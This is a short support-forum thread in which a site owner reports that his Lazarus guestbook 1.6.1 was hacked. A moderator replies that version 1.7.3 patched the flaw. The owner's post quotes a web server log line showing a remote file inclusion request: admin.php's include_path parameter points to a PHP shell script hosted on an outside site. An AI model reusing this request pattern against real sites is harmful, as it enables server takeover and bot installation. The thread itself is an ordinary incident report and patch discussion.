If you are not registered or logged in, you may still use these forums but with limited features. Show recent topics
  [Search] Search   [Hottest Topics] Hottest Topics   [Members]  Member Listing   [FAQ]  FAQ 
[Register] Register / 
[Login] Login 
lazarusbg 1.6.1 hacked via admin.php  XML
Forum Index » Advanced Guestbook Forum
Author Message
molekuul
Newbie

Joined: 12/03/2006 10:20:07
Messages: 2
Offline

Via this post a shell was created to install a bot at my web server.


"POST //guestbook/
admin.php?include_path=http://www.gonfiabiligamespark.it/flash/
r57.txt? HTTP/1.1" 200 5036 "http://
www.MYSITE.nl//guestbook/admin.php?
include_path=http://www.gonfiabiligamespark.it/flash/r57.txt?"
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.0.3705; InfoPath.1; .NET CLR 1.1.4322; Media Center PC 4.0; .NET
CLR 2.0.50727)"

Has this been fixed in a new version of the guestbook ?
Carbonize
Master
[Avatar]

Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
Offline

Well for a start this is the Advanced Guestbook forum not the Lazarus forum. Also Lazarus is now on version 1.7.3 which was release on March 3rd to patch this particular exploit.

Carbonize
I am not the maker of the Advanced Guestbook

get Lazarus
[Email] [WWW] [Yahoo!] aim icon [MSN] [ICQ]
molekuul
Newbie

Joined: 12/03/2006 10:20:07
Messages: 2
Offline

thanks Carbinize, I initialy couldn't find the lazarus forum.
I found it now, and patched my guestbook.
Thanks
Carbonize
Master
[Avatar]

Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
Offline

Sign up to the mailing list to be kept up to date with releases and patches.

Carbonize
I am not the maker of the Advanced Guestbook

get Lazarus
[Email] [WWW] [Yahoo!] aim icon [MSN] [ICQ]
 
Forum Index » Advanced Guestbook Forum
Go to:   
Based on the open source JForum